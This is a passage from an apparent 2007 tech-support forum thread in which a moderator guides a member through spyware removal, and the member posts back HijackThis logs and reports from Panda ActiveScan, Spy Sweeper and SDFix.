O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_08\bin\ssv.dll
O9 - Extra button: Yahoo! Services - {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} - C:\Program Files\Yahoo!\Common\yiesrvc.dll
O9 - Extra button: Run DAP - {669695BC-A811-4A9D-8CDF-BA8C795F261C} - D:\PROGRA~1\DAP\DAP.EXE
O9 - Extra button: (no name) - {85d1f590-48f4-11d9-9669-0800200c9a66} - %windir%\bdoscandel.exe (file missing)
O9 - Extra 'Tools' menuitem: Uninstall BitDefender Online Scanner v8 - {85d1f590-48f4-11d9-9669-0800200c9a66} - %windir%\bdoscandel.exe (file missing)
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - D:\PROGRA~1\MICROS~1\OFFICE11\REFIEBAR.DLL
O9 - Extra button: Email Extractor - {AFA7DB99-3E4D-4396-94F8-B0B135BCB472} - res://D:\Program%20Files\Advanced%20Email%20Extractor\AeeMsie.dll/page.html (file missing) (HKCU)
O9 - Extra 'Tools' menuitem: Advanced Email Extractor - {AFA7DB99-3E4D-4396-94F8-B0B135BCB472} - res://D:\Program%20Files\Advanced%20Email%20Extractor\AeeMsie.dll/page.html (file missing) (HKCU)
O10 - Unknown file in Winsock LSP: c:\windows\system32\mwtsp.dll
O10 - Unknown file in Winsock LSP: c:\windows\system32\mwtsp.dll
O10 - Unknown file in Winsock LSP: c:\windows\system32\mwtsp.dll
O16 - DPF: {30528230-99f7-4bb4-88d8-fa1d4f56a2ab} (YInstStarter Class) - C:\Program Files\Yahoo!\Common\yinsthelper.dll
O16 - DPF: {5D86DDB5-BDF9-441B-9E9E-D4730F4EE499} (BDSCANONLINE Control) - http://download.bitdefender.com/resources/scan8/oscan8.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{17BBF687-1141-4522-B007-EF63C7F4B7EE}: NameServer = 202.54.6.60,202.54.29.5
O20 - Winlogon Notify: !SASWinLogon - D:\Program Files\SUPERAntiSpyware\SASWINLO.dll
O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINDOWS\System32\Ati2evxx.exe
O23 - Service: ATI Smart - Unknown owner - C:\WINDOWS\system32\ati2sgag.exe
O23 - Service: AVG Anti-Spyware Guard - Anti-Malware Development a.s. - D:\Program Files\AVG Anti-Spyware 7.5\guard.exe
O23 - Service: eScan Server-Updater (eScan-trayicos) - MicroWorld Technologies Inc. - C:\PROGRA~1\eScan\TRAYSSER.EXE
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: iPodService - Apple Computer, Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: eScan Monitor Service (KAVMonitorService) - Kaspersky Labs. - C:\PROGRA~1\eScan\avpm.exe
O23 - Service: MWAgent - MicroWorld Technologies Inc. - C:\PROGRA~1\COMMON~1\MICROW~1\Agent\MWASER.EXE
O23 - Service: STI Simulator - Unknown owner - C:\WINDOWS\System32\PAStiSvc.exe
Feb 9 2007, 06:17 PM
Post #9
I hate computers (Group: Moderators, Posts: 8,645, Joined: 12-April 05, Member No.: 1,352)
Uninstall spyware nuker. If you don't see it in add/remove programs don't worry about it.
Your computer is still pretty bad. Let's run a few more tools.

Run Panda ActiveScan from Here.
- Once you are on the Panda site click the Scan your PC button
- A new window will open... click the Check Now button
- Enter your Country
- Enter your State/Province
- Enter your e-mail address and click send
- Select either Home User or Company
- Click the big Scan Now button
- If it wants to install an ActiveX component allow it
- It will start downloading the files it requires for the scan (Note: It may take a couple of minutes)
- When the download is complete, click on Local Disks to start the scan
- When the scan completes, if anything malicious is detected, click the See Report button, then Save Report and save it to a convenient location so you can post it back.

---------

Please download WebRoot SpySweeper from HERE (It's a 14 day trial):
-------------------- Having problems with spyware and viruses? If so then please follow the Spyware Removal Guide
Want to know how to protect your clean computer from viruses and spyware? Then please follow the Malware Prevention Guide. Looking for good free security software (or other great free stuff)? Then please take a look at the Recommended Security Applications Guide
Feb 10 2007, 07:33 AM
Post #10
Member (Group: Members, Posts: 16, Joined: 4-February 07, Member No.: 10,964)
I USED THE TWO TOOLS AND BELOW ARE THE REPORTS:
IT SEEMS MY SYSTEM IS DAMAGED VERY BADLY

1) PANDA REPORT:

Incident Status Location
Adware:adware/ipinsight Not disinfected c:\windows\system32\sentry.sys
Adware:adware/powerstrip Not disinfected Windows Registry
Virus:Trj/Mailbot.BJ Disinfected C:\Documents and Settings\Sys\3.exe
Spyware:Cookie/YieldManager Not disinfected C:\Documents and Settings\Sys\Cookies\sys@ad.yieldmanager[2].txt
Spyware:Cookie/Atlas DMT Not disinfected C:\Documents and Settings\Sys\Cookies\sys@atdmt[1].txt
Spyware:Cookie/Bluestreak Not disinfected C:\Documents and Settings\Sys\Cookies\sys@bluestreak[1].txt
Spyware:Cookie/Casalemedia Not disinfected C:\Documents and Settings\Sys\Cookies\sys@casalemedia[2].txt
Spyware:Cookie/Doubleclick Not disinfected C:\Documents and Settings\Sys\Cookies\sys@doubleclick[1].txt
Spyware:Cookie/FastClick Not disinfected C:\Documents and Settings\Sys\Cookies\sys@fastclick[2].txt
Spyware:Cookie/FastClick Not disinfected C:\Documents and Settings\Sys\Cookies\sys@media.fastclick[1].txt
Spyware:Cookie/Tribalfusion Not disinfected C:\Documents and Settings\Sys\Cookies\sys@tribalfusion[1].txt
Potentially unwanted tool:Application/Processor Not disinfected C:\Documents and Settings\Sys\Desktop\BMK\SmitfraudFix\Process.exe
Potentially unwanted tool:Application/Processor Not disinfected C:\Documents and Settings\Sys\Desktop\BMK\SmitfraudFix\SmitfraudFix\Process.exe
Potentially unwanted tool:Application/Processor Not disinfected C:\Documents and Settings\Sys\Desktop\SmitfraudFix.zip[SmitfraudFix/Process.exe]
Potentially unwanted tool:Application/Processor Not disinfected C:\Documents and Settings\Sys\Desktop\SPYWARE\SmitFraudFix\SmitfraudFix\Process.exe
Adware:Adware/Aureate-Radiate Not disinfected C:\WINDOWS\system32\GMAGlue.exe
Virus:W32/Sdbot.ftp.worm Disinfected C:\WINDOWS\system32\i
Potentially unwanted tool:Application/Processor Not disinfected C:\WINDOWS\system32\Process.exe
Adware:Adware/Aureate-Radiate Not disinfected D:\Program Files\Group Mail\BACKUP\GMAGlue.exe
Adware:Adware/Aureate-Radiate Not disinfected D:\Program Files\Group Mail\BACKUP\GMAGlue.001
Adware:Adware/Aureate-Radiate Not disinfected F:\Zip\Group Mail Plus v3.4.071 with serial\infactagmplus.exe[GMAGLUE.EXE]

2) SPY SWEEPER REPORT:

12:52 PM: Removal process completed. Elapsed time 00:00:07
12:52 PM: Quarantining All Traces: burstnet cookie
12:52 PM: Quarantining All Traces: tribalfusion cookie
12:52 PM: Quarantining All Traces: bluestreak cookie
12:52 PM: Quarantining All Traces: atlas dmt cookie
12:52 PM: Quarantining All Traces: casalemedia cookie
12:52 PM: Quarantining All Traces: yieldmanager cookie
12:51 PM: Quarantining All Traces: maxifiles
12:51 PM: Removal process initiated
12:51 PM: Traces Found: 8
12:51 PM: Custom Sweep has completed. Elapsed time 00:17:26
12:51 PM: File Sweep Complete, Elapsed Time: 00:14:57
12:50 PM: ApplicationMinimized - EXIT
12:50 PM: ApplicationMinimized - EXIT
12:50 PM: ApplicationMinimized - ENTER
12:50 PM: ApplicationMinimized - ENTER
12:50 PM: Warning: TCompressedFile.GetStreams(1): Stream read error
12:45 PM: Warning: SweepDirectories: Cannot find directory "g:". This directory was not added to the list of paths to be scanned.
12:39 PM: Warning: Failed to open file "c:\program files\escan\spooler.lck". The operation completed successfully
12:39 PM: Warning: Failed to open file "c:\program files\escan\maildisp.lck". The operation completed successfully
12:39 PM: Warning: Failed to open file "c:\program files\escan\maildsp1.lck". The operation completed successfully
12:36 PM: Starting File Sweep
12:36 PM: Warning: SweepDirectories: Cannot find directory "a:". This directory was not added to the list of paths to be scanned.
12:36 PM: Cookie Sweep Complete, Elapsed Time: 00:00:00
12:36 PM: c:\documents and settings\sys\cookies\sys@www.burstnet[1].txt (ID = 2337)
12:36 PM: Found Spy Cookie: burstnet cookie
12:36 PM: c:\documents and settings\sys\cookies\sys@tribalfusion[1].txt (ID = 3589)
12:36 PM: Found Spy Cookie: tribalfusion cookie
12:36 PM: c:\documents and settings\sys\cookies\sys@casalemedia[2].txt (ID = 2354)
12:36 PM: c:\documents and settings\sys\cookies\sys@bluestreak[1].txt (ID = 2314)
12:36 PM: Found Spy Cookie: bluestreak cookie
12:36 PM: c:\documents and settings\sys\cookies\sys@atdmt[1].txt (ID = 2253)
12:36 PM: Found Spy Cookie: atlas dmt cookie
12:36 PM: c:\documents and settings\sys\cookies\sys@as.casalemedia[1].txt (ID = 2355)
12:36 PM: Found Spy Cookie: casalemedia cookie
12:36 PM: c:\documents and settings\sys\cookies\sys@ad.yieldmanager[2].txt (ID = 3751)
12:36 PM: Found Spy Cookie: yieldmanager cookie
12:36 PM: Starting Cookie Sweep
12:36 PM: Registry Sweep Complete, Elapsed Time:00:00:22
12:36 PM: HKLM\software\microsoft\juan\ (ID = 1781228)
12:36 PM: Found Adware: maxifiles
12:35 PM: Starting Registry Sweep
12:35 PM: Memory Sweep Complete, Elapsed Time: 00:01:35
12:34 PM: Starting Memory Sweep
12:34 PM: Start Custom Sweep
12:34 PM: Sweep initiated using definitions version 845
12:29 PM: Access to Hosts file allowed for D:\PROGRAM FILES\AVG ANTI-SPYWARE 7.5\AVGAS.EXE
12:26 PM: There is a problem reaching the server. The cause may be in your connection, or on the server. Please try again later.
12:26 PM: ApplicationMinimized - EXIT
12:26 PM: ApplicationMinimized - ENTER
Keylogger: Off
BHO Shield: On
IE Security Shield: On
Alternate Data Stream (ADS) Execution Shield: On
Startup Shield: On
Common Ad Sites: Off
Hosts File Shield: On
Internet Communication Shield: On
ActiveX Shield: On
Windows Messenger Service Shield: On
IE Favorites Shield: On
Spy Installation Shield: On
Memory Shield: Off
IE Hijack Shield: On
IE Tracking Cookies Shield: Off
12:25 PM: Shield States
12:25 PM: Spyware Definitions: 845
12:24 PM: Spy Sweeper 5.3.1.2344 started
12:24 PM: Spy Sweeper 5.3.1.2344 started
12:24 PM: | Start of Session, Saturday, February 10, 2007 |
***************

3) NEW HIJACKTHIS LOG:

Logfile of HijackThis v1.99.1
Scan saved at 1:00:52 PM, on 2/10/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\System32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
D:\Program Files\AVG Anti-Spyware 7.5\guard.exe
C:\PROGRA~1\eScan\TRAYSSER.EXE
C:\PROGRA~1\eScan\avpm.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\PROGRA~1\COMMON~1\MICROW~1\Agent\MWASER.EXE
C:\WINDOWS\system32\Ati2evxx.exe
C:\PROGRA~1\COMMON~1\MICROW~1\Agent\MWAgent.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\System32\PAStiSvc.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Webroot\Spy Sweeper\SpySweeper.exe
C:\WINDOWS\sm56hlpr.exe
C:\WINDOWS\RTHDCPL.EXE
C:\Program Files\GlobespanVirata\Adsl\dslstat.exe
C:\Program Files\GlobespanVirata\Adsl\dslagent.exe
C:\Program Files\Adobe\Photoshop Album Starter Edition\3.0\Apps\apdproxy.exe
C:\Program Files\Common Files\Real\Update_OB\realsched.exe
C:\PROGRA~1\eScan\TRAYICOS.EXE
C:\PROGRA~1\eScan\MAILDISP.EXE
C:\PROGRA~1\eScan\AVPMWrap.EXE
C:\PROGRA~1\eScan\MAILSCAN.EXE
C:\PROGRA~1\ESCAN\SPOOLER.EXE
C:\PROGRA~1\eScan\kavss.exe
D:\Program Files\AVG Anti-Spyware 7.5\avgas.exe
C:\WINDOWS\System32\ctfmon.exe
C:\Program Files\Messenger\msmsgs.exe
C:\PROGRA~1\eScan\AvpM.exe
C:\Program Files\Google\GoogleToolbarNotifier\1.2.908.8472\GoogleToolbarNotifier.exe
C:\PROGRA~1\Yahoo!\MESSEN~1\ymsgr_tray.exe
D:\Program Files\Skype\Phone\Skype.exe
D:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe
C:\Program Files\SAMSUNG\Samsung Multimedia Keyboard\gpkbd.exe
C:\Program Files\Webroot\Spy Sweeper\SpySweeperUI.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Webroot\Spy Sweeper\SSU.EXE
C:\Program Files\Internet Explorer\iexplore.exe
C:\HIJACKTHIS\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = about:
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://www.google.com/ie
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.co.in/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = about:
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com/ie
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = http://www.google.com/ie
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.google.com/ie
R1 - HKLM\Software\Microsoft\Internet Explorer\Search,Default_Search_URL = http://www.google.com/ie
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.google.com/ie
R1 - HKCU\Software\Microsoft\Internet Explorer\SearchURL,(Default) = http://www.google.com/search?q=%s
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page =
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page =
R1 - HKCU\Software\Microsoft\Internet Connection Wizard,ShellNext = iexplore
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
R3 - URLSearchHook: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - (no file)
O2 - BHO: DAPHelper Class - {0000CC75-ACF3-4cac-A0A9-DD3868E06852} - D:\Program Files\DAP\DAPBHO.dll
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: (no name) - {481E7983-1F2B-4250-951A-44E0902DF978} - (no file)
O2 - BHO: Yahoo! IE Services Button - {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} - C:\Program Files\Yahoo!\Common\yiesrvc.dll
O2 - BHO: (no name) - {68D5CF1D-EC5C-4bdd-A9EF-F0E517565D50} - (no file)
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.5.0_08\bin\ssv.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar2.dll
O2 - BHO: (no name) - {F2496031-4FE4-497E-8F75-04E0A180366E} - C:\WINDOWS\System32\vtsqn.dll (file missing)
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O3 - Toolbar: DAP Bar - {62999427-33FC-4baf-9C9C-BCE6BD127F08} - D:\Program Files\DAP\DAPIEBar.dll
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar2.dll
O4 - HKLM\..\Run: [SMSERIAL] sm56hlpr.exe
O4 - HKLM\..\Run: [RTHDCPL] RTHDCPL.EXE
O4 - HKLM\..\Run: [Alcmtr] ALCMTR.EXE
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [DSLSTATEXE] "C:\Program Files\GlobespanVirata\Adsl\dslstat.exe" icon
O4 - HKLM\..\Run: [DSLAGENTEXE] "C:\Program Files\GlobespanVirata\Adsl\dslagent.exe"
O4 - HKLM\..\Run: [Adobe Photo Downloader] "C:\Program Files\Adobe\Photoshop Album Starter Edition\3.0\Apps\apdproxy.exe"
O4 - HKLM\..\Run: [TkBellExe] "C:\Program Files\Common Files\Real\Update_OB\realsched.exe" -osboot
O4 - HKLM\..\Run: [john315] C:\WINDOWS\system32\srrvc.exe
O4 - HKLM\..\Run: [MailScan Dispatcher] "C:\Program Files\eScan\LAUNCH.EXE"
O4 - HKLM\..\Run: [eScan Updater] "C:\PROGRA~1\eScan\TRAYICOS.EXE" /App
O4 - HKLM\..\Run: [eScan Monitor] C:\PROGRA~1\eScan\AVPMWrap.EXE
O4 - HKLM\..\Run: [staeck12] C:\WINDOWS\system32\mfcee.exe
O4 - HKLM\..\Run: [melg34] C:\WINDOWS\system32\mdmd.exe
O4 - HKLM\..\Run: [!AVG Anti-Spyware] "D:\Program Files\AVG Anti-Spyware 7.5\avgas.exe" /minimized
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\System32\ctfmon.exe
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
O4 - HKCU\..\Run: [Yahoo! Pager] "C:\PROGRA~1\Yahoo!\MESSEN~1\YAHOOM~1.EXE" -quiet
O4 - HKCU\..\Run: [swg] "C:\Program Files\Google\GoogleToolbarNotifier\1.2.908.8472\GoogleToolbarNotifier.exe"
O4 - HKCU\..\Run: [Skype] "D:\Program Files\Skype\Phone\Skype.exe" /nosplash /minimized
O4 - HKCU\..\Run: [john315] C:\WINDOWS\system32\srrvc.exe
O4 - HKCU\..\Run: [staeck12] C:\WINDOWS\system32\mfcee.exe
O4 - HKCU\..\Run: [melg34] C:\WINDOWS\system32\mdmd.exe
O4 - HKCU\..\Run: [SUPERAntiSpyware] "D:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe"
O4 - Global Startup: Adobe Gamma Loader.lnk = C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
O4 - Global Startup: Samsung Multimedia Keyboard.lnk = ?
O8 - Extra context menu item: &Download with &DAP - D:\PROGRA~1\DAP\dapextie.htm
O8 - Extra context menu item: &Yahoo! Search - file:///C:\Program Files\Yahoo!\Common/ycsrch.htm
O8 - Extra context menu item: Advanced Email Extractor - res://D:\Program%20Files\Advanced%20Email%20Extractor\AeeMsie.dll/page.html
O8 - Extra context menu item: Download &all with DAP - D:\PROGRA~1\DAP\dapextie2.htm
O8 - Extra context menu item: E&xport to Microsoft Excel - res://D:\PROGRA~1\MICROS~1\OFFICE11\EXCEL.EXE/3000
O8 - Extra context menu item: Scan link with AEE - res://D:\Program%20Files\Advanced%20Email%20Extractor\AeeMsie.dll/link.html
O8 - Extra context menu item: Yahoo! &Dictionary - file:///C:\Program Files\Yahoo!\Common/ycdict.htm
O8 - Extra context menu item: Yahoo! &Maps - file:///C:\Program Files\Yahoo!\Common/ycmap.htm
O8 - Extra context menu item: Yahoo! &SMS - file:///C:\Program Files\Yahoo!\Common/ycsms.htm
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_08\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_08\bin\ssv.dll
O9 - Extra button: Yahoo! Services - {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} - C:\Program Files\Yahoo!\Common\yiesrvc.dll
O9 - Extra button: Run DAP - {669695BC-A811-4A9D-8CDF-BA8C795F261C} - D:\PROGRA~1\DAP\DAP.EXE
O9 - Extra button: (no name) - {85d1f590-48f4-11d9-9669-0800200c9a66} - %windir%\bdoscandel.exe (file missing)
O9 - Extra 'Tools' menuitem: Uninstall BitDefender Online Scanner v8 - {85d1f590-48f4-11d9-9669-0800200c9a66} - %windir%\bdoscandel.exe (file missing)
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - D:\PROGRA~1\MICROS~1\OFFICE11\REFIEBAR.DLL
O9 - Extra button: Email Extractor - {AFA7DB99-3E4D-4396-94F8-B0B135BCB472} - res://D:\Program%20Files\Advanced%20Email%20Extractor\AeeMsie.dll/page.html (file missing) (HKCU)
O9 - Extra 'Tools' menuitem: Advanced Email Extractor - {AFA7DB99-3E4D-4396-94F8-B0B135BCB472} - res://D:\Program%20Files\Advanced%20Email%20Extractor\AeeMsie.dll/page.html (file missing) (HKCU)
O10 - Unknown file in Winsock LSP: c:\windows\system32\mwtsp.dll
O10 - Unknown file in Winsock LSP: c:\windows\system32\mwtsp.dll
O10 - Unknown file in Winsock LSP: c:\windows\system32\mwtsp.dll
O16 - DPF: {30528230-99f7-4bb4-88d8-fa1d4f56a2ab} (YInstStarter Class) - C:\Program Files\Yahoo!\Common\yinsthelper.dll
O16 - DPF: {9A9307A0-7DA4-4DAF-B042-5009F29E09E1} (ActiveScan Installer Class) - http://acs.pandasoftware.com/activescan/as5free/asinst.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{17BBF687-1141-4522-B007-EF63C7F4B7EE}: NameServer = 202.54.6.60,202.54.29.5
O17 - HKLM\System\CCS\Services\Tcpip\..\{7A1DA16E-B943-4E3A-A5A8-FF298FFD2041}: NameServer = 202.54.29.5 202.54.6.60
O20 - Winlogon Notify: !SASWinLogon - D:\Program Files\SUPERAntiSpyware\SASWINLO.dll
O20 - Winlogon Notify: WRNotifier - C:\WINDOWS\SYSTEM32\WRLogonNTF.dll
O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINDOWS\System32\Ati2evxx.exe
O23 - Service: ATI Smart - Unknown owner - C:\WINDOWS\system32\ati2sgag.exe
O23 - Service: AVG Anti-Spyware Guard - Anti-Malware Development a.s. - D:\Program Files\AVG Anti-Spyware 7.5\guard.exe
O23 - Service: eScan Server-Updater (eScan-trayicos) - MicroWorld Technologies Inc. - C:\PROGRA~1\eScan\TRAYSSER.EXE
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: iPodService - Apple Computer, Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: eScan Monitor Service (KAVMonitorService) - Kaspersky Labs. - C:\PROGRA~1\eScan\avpm.exe
O23 - Service: MWAgent - MicroWorld Technologies Inc. - C:\PROGRA~1\COMMON~1\MICROW~1\Agent\MWASER.EXE
O23 - Service: STI Simulator - Unknown owner - C:\WINDOWS\System32\PAStiSvc.exe
O23 - Service: Webroot Spy Sweeper Engine (WebrootSpySweeperService) - Webroot Software, Inc. - C:\Program Files\Webroot\Spy Sweeper\SpySweeper.exe
Feb 10 2007, 10:57 AM
Post #11
Member (Group: Members, Posts: 16, Joined: 4-February 07, Member No.: 10,964)
Besides, I have one doubt: my internet connection has become invariably very slow after installing the spyware/adware software. If I open an additional window, the transfer of bytes stops completely, so I have to restart my system to browse the internet. Any suggestion why this is happening? Can I uninstall this software now? Please comment.
Feb 10 2007, 05:10 PM
Post #12
I hate computers (Group: Moderators, Posts: 8,645, Joined: 12-April 05, Member No.: 1,352)
You can uninstall webroot spysweeper if you want. Keep the others because we will probably need them again.
Download SDFix and save it to your Desktop.

Double click SDFix.exe and it will extract the files to %systemdrive% (the drive that contains the Windows directory, typically C:\SDFix).

Please then reboot your computer in Safe Mode by doing the following:
Feb 11 2007, 07:00 AM
Post #13
Member (Group: Members, Posts: 16, Joined: 4-February 07, Member No.: 10,964)
THANKS RRIDGELY, BELOW ARE THE REPORTS, PLEASE ADVISE NEXT STEP :
1) SDFix report:

SDFix: Version 1.64
Run by: Sys - Sun 02/11/2007 @ 12:19:12.87
Microsoft Windows XP [Version 5.1.2600]
Running From: C:\SDFix

Safe Mode:
Checking Services:
Name:
Path:
Restoring Windows Registry Entries
Restoring Default Hosts File
Rebooting...

Normal Mode:
Checking Files:
Below files will be copied to Backups folder then removed:
C:\WINDOWS\system32\eraseme_38347.exe - Deleted
C:\WINDOWS\system32\eraseme_46035.exe - Deleted
C:\WINDOWS\system32\eraseme_51380.exe - Deleted
C:\WINDOWS\system32\i - Deleted
C:\WINDOWS\system32\plscd.exe - Deleted
C:\WINDOWS\system32\setup_23367.exe - Deleted

ADS Check:
C:\WINDOWS\system32
No streams found.

Final Check:
Remaining Files:
---------------
Backups Folder: - C:\SDFix\backups\backups.zip

Checking For Files with Hidden Attributes :
C:\WINDOWS\system32\FC5303FB6F.sys
C:\WINDOWS\system32\KGyGaAvL.sys
C:\WINDOWS\LastGood.Tmp\INF\oem5.inf
C:\WINDOWS\LastGood.Tmp\INF\oem5.PNF

Finished

2) NEW HIJACKTHIS LOG:

Logfile of HijackThis v1.99.1
Scan saved at 12:27:02 PM, on 2/11/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\System32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
D:\Program Files\AVG Anti-Spyware 7.5\guard.exe
C:\PROGRA~1\eScan\TRAYSSER.EXE
C:\PROGRA~1\eScan\avpm.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\PROGRA~1\COMMON~1\MICROW~1\Agent\MWASER.EXE
C:\PROGRA~1\COMMON~1\MICROW~1\Agent\MWAgent.exe
C:\WINDOWS\System32\PAStiSvc.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Webroot\Spy Sweeper\SpySweeper.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\sm56hlpr.exe
C:\WINDOWS\RTHDCPL.EXE
C:\Program Files\GlobespanVirata\Adsl\dslstat.exe
C:\Program Files\GlobespanVirata\Adsl\dslagent.exe
C:\Program Files\Adobe\Photoshop Album Starter Edition\3.0\Apps\apdproxy.exe
C:\Program Files\Common Files\Real\Update_OB\realsched.exe
C:\PROGRA~1\eScan\TRAYICOS.EXE
C:\PROGRA~1\eScan\AVPMWrap.EXE
C:\PROGRA~1\eScan\MAILDISP.EXE
C:\PROGRA~1\ESCAN\SPOOLER.EXE
C:\PROGRA~1\eScan\MAILSCAN.EXE
C:\PROGRA~1\eScan\kavss.exe
D:\Program Files\AVG Anti-Spyware 7.5\avgas.exe
C:\WINDOWS\System32\ctfmon.exe
C:\Program Files\Messenger\msmsgs.exe
C:\PROGRA~1\eScan\AvpM.exe
C:\Program Files\Google\GoogleToolbarNotifier\1.2.908.8472\GoogleToolbarNotifier.exe
C:\PROGRA~1\Yahoo!\MESSEN~1\ymsgr_tray.exe
D:\Program Files\Skype\Phone\Skype.exe
D:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe
C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
C:\HIJACKTHIS\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = about:
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://www.google.com/ie
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.co.in/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = about:
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com/ie
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = http://www.google.com/ie
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.google.com/ie
R1 - HKLM\Software\Microsoft\Internet Explorer\Search,Default_Search_URL = http://www.google.com/ie
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.google.com/ie
R1 - HKCU\Software\Microsoft\Internet Explorer\SearchURL,(Default) = http://www.google.com/search?q=%s
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page =
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page =
R1 - HKCU\Software\Microsoft\Internet Connection Wizard,ShellNext = iexplore
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
R3 - URLSearchHook: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - (no file)
O2 - BHO: DAPHelper Class - {0000CC75-ACF3-4cac-A0A9-DD3868E06852} - D:\Program Files\DAP\DAPBHO.dll
